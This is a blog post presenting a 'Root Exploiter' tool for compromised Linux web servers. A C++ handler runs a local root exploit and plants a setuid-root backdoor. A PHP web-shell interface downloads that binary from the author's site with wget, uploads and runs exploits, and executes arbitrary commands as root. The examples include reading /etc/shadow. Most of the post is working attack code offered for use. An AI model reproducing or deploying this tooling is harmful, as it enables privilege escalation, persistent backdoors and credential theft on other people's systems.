This post has the same goals as of the previous one i.e. to get root access on the target machine with just a PHP interface and no back-connect or reverse connection. So, if you haven’t already, read the part 1 of this post here [PHP][Python] Root Exploiter – No Back-Connect.
In the previous version of this article, I used subprocess, pipes, popen and pexpect in Python to interact with another exploit. This time, I’m going to show a rather simpler approach to interact with another program or executable without loosing the session (prompt) on the run time via simple PHP interface.
I’m going to use a binary executable coded in C++ to act as a handler to our exploit and also a persistent back-door to a privileged user (root) account. Here’s a detailed demo of the whole process.
Here’s the C++ code of the executable and it’s quite self explanatory.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 |
#include <iostream> #include <string.h> #include <getopt.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> using namespace std; int main ( int argc, char **arg ); int exec_command ( char const action[], char const * cmd ); void banner ( ); void menu ( char arg[] ); void banner() { cout << endl << "By MakMan -- //mukarramkhalid.com" << endl; } void menu( char arg[] ) { cout << "Expected arguments as : " << arg << " [OPTIONS]" << endl; cout << "-- Execute your local root exploit" << endl; cout << " --exploit = Exploit Name Here OR --e = Exploit Name Here" << endl; cout << "-- To execute command as root user." << endl; cout << " --command = Command Here OR --c = Command Here" << endl; cout << "-- To print this menu." << endl; cout << " --help OR --h To print this menu" << endl; } int exec_command( char const action[], char const * cmd ) { FILE * fp; char path[1035]; char const * root_backdoor; root_backdoor = "chown root makman;chmod u+s makman;whoami;id\n"; if ( action == "e" ) { fp = popen( cmd, "w" ); fwrite( "whoami;", 1, 8, fp ); fwrite( root_backdoor, 1, strlen( root_backdoor ), fp ); } else if ( action == "c" ) { fp = popen( cmd, "r" ); } if ( fp == NULL ) { cout << "Failed to run" << endl; return 0; } while ( fgets( path, sizeof( path )-1, fp ) != NULL ) { cout << path << endl; } pclose( fp ); return 1; } int main( int argc, char **argv ) { banner(); char const * exploit="none", * command="none"; if ( argc <= 1 ) { menu( argv[0] ); } int c; const char short_opt[]= "he:c:"; struct option long_opt[] = { { "help", no_argument, NULL, 'h' }, { "exploit", required_argument, NULL, 'e' }, { "command", required_argument, NULL, 'c' }, { NULL, 0, NULL, 0 } }; while ( ( c = getopt_long( argc, argv, short_opt, long_opt, NULL ) ) != -1 ) { switch( c ) { case -1: case 0: break; case 'e': exploit = optarg; break; case 'c': command = optarg; break; case 'h': menu(argv[0]); return(0); default: menu(argv[0]); return(0); }; }; setuid( 0 ); if ( exploit != "none" && command == "none" ) { exec_command( "e", exploit ); } else if ( exploit == "none" && command != "none" ) { exec_command( "c", command ); } return 0; } |
This code can be compiled by using the g++ compiler or you can download the pre compiled executable from Here. This binary executable can be used directly via any PHP shell. For example, to run your local root exploit, you can simply do:
1 |
./makman --exploit="./Name_of_the_exploit_here" |
If the exploit is successful, the file permissions of the handler makman will be changed to 4755 with root as the owner which means that the UID bit of this file is set. Now you can run your commands as a root user.
1 2 3 4 5 |
./makman --command="whoami" #OR ./makman --command="cat /etc/shadow" |
I have also coded a PHP interface to automate this whole process just like the previous version.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 |
<?php /* -- By MakMan -- http://www.mukarramkhalid.com -- http://makman.tk -- https://www.facebook.com/makmaniac -- https://twitter.com/themakmaniac */ ini_set('error_reporting', 0); ini_set('max_execution_time', 0); $handle_url = "http://makman.tk/scripts/makman"; $path = getcwd()."/"; $cmd = ( isset( $_POST["cmd"] ) ? $_POST["cmd"] : '' ); $exploit = ( isset( $_POST["check_exploit"] ) ? $_FILES["exploit"]["name"] : '' ); ?> <!doctype html> <html> <head> <meta charset='utf-8'> <title>MakMan - Root Exploiter - 2</title> <style type='text/css'> body { font: normal 15px Verdana; color: #ffffff; background-color: #000000; } textarea { width: 100%; height: 300px; resize: none; overflow-y: scroll; } pre { text-align: center; } a { text-decoration: none; color: #ff0000; } a:hover { text-decoration: underline; color: #ff0000; } .green { font: normal 15px Verdana; color: #00ff00; text-align: center; } .red { font: normal 15px Verdana; color: #ff0000; text-align: center; } </style> </head> <body> <pre> +-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ |L|o|c|a|l| |R|o|o|t| |E|x|p|l|o|i|t|e|r| -- | 2 | +-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ </pre> <h1 class='red'>By <a href='//mukarramkhalid.com'>MakMan</a></h1> <pre> ---------------------------------------------------------------------- </pre> <?php ################################ MAKMAN_FUNCTIONS ################################# function check_os( ) { if ( strtoupper( substr( PHP_OS, 0, 3 ) ) === "WIN" ) { exit( "<p class='red'>Only works on Linux</p></body></html>" ); } } function format_output( $out ) { foreach( $out as $o ) { echo htmlspecialchars( preg_replace( "/\x1b\[[0-9;]*m/", "", trim( $o ) ) )."\n"; } } function check_session( ) { global $path; clearstatcache( ); if( fileowner( $path."makman" ) == 0 && file_exists( $path."makman" ) && filesize( $path."makman" ) != 0 && decoct( fileperms( $path."makman" ) ) == 104755 ) { return true; } else { return false; } } function download_module( ) { global $path, $handle_url; if( !file_exists( $path."makman" ) || filesize( $path."makman" ) == 0 ) { exec( "wget ".$handle_url." -O ".$path."makman" ); chmod( $path."makman", 0755 ); if( !file_exists( $path."makman" ) || filesize( $path."makman" ) == 0 ) { return false; } else { return true; } } return true; } function execute($action, $exp) { global $path, $handle_url; if(download_module()) { if( $action == "exploit" ) { if( move_uploaded_file( $_FILES["exploit"]["tmp_name"], $path.$exp ) ) { chmod( $path.$exp, 0755 ); exec( $path."makman --exploit='".$path.$exp."'", $output ); format_output( $output ); } else { echo "Failed to Upload. Check the path ".$path." and set proper permissions."; } } else if ($action == "command") { exec( $path."makman --command='".$exp."'", $output ); format_output($output); } } else { echo "Failed to download the handler from ".$handle_url.". Download it manually and save it here ".$path."makman with 'chmod +x'."; } } ################################ MAKMAN_MAIN ######################################### check_os( ); if( check_session( ) ) { echo "<p class='green'>Root session exists. Insert commands to execute.</p>"; echo "<textarea>"; if( isset( $_POST["cmd"] ) ) { execute( "command", $cmd ); } echo "</textarea>"; echo " <center> <form method='POST' action=''> <input name='cmd' type='text' autofocus><br> <input name='Submit' value='Submit' type='submit'><br> </form> </center> "; } else { if( isset( $_POST["check_exploit"] ) ) { echo "<textarea>"; execute( "exploit", $exploit ); echo "\nRefreshing page in 2 seconds."; echo "</textarea>"; header( "Refresh:2" ); } echo "<p class='red'>Session not found. Upload your local root exploit to execute.</p>"; echo " <center> <form method='POST' action='' enctype='multipart/form-data'> <input name='check_exploit' type='hidden' value='1'> <input name='exploit' type='file'> <input name='Submit' value='Submit' type='submit'><br> </form> </center> "; } ?> </body> </html> |
This is what it looks like.
Downloads:
GitHub Repository:
If you have any further suggestions, feel free to contact me. Details are in the footer. Thanks.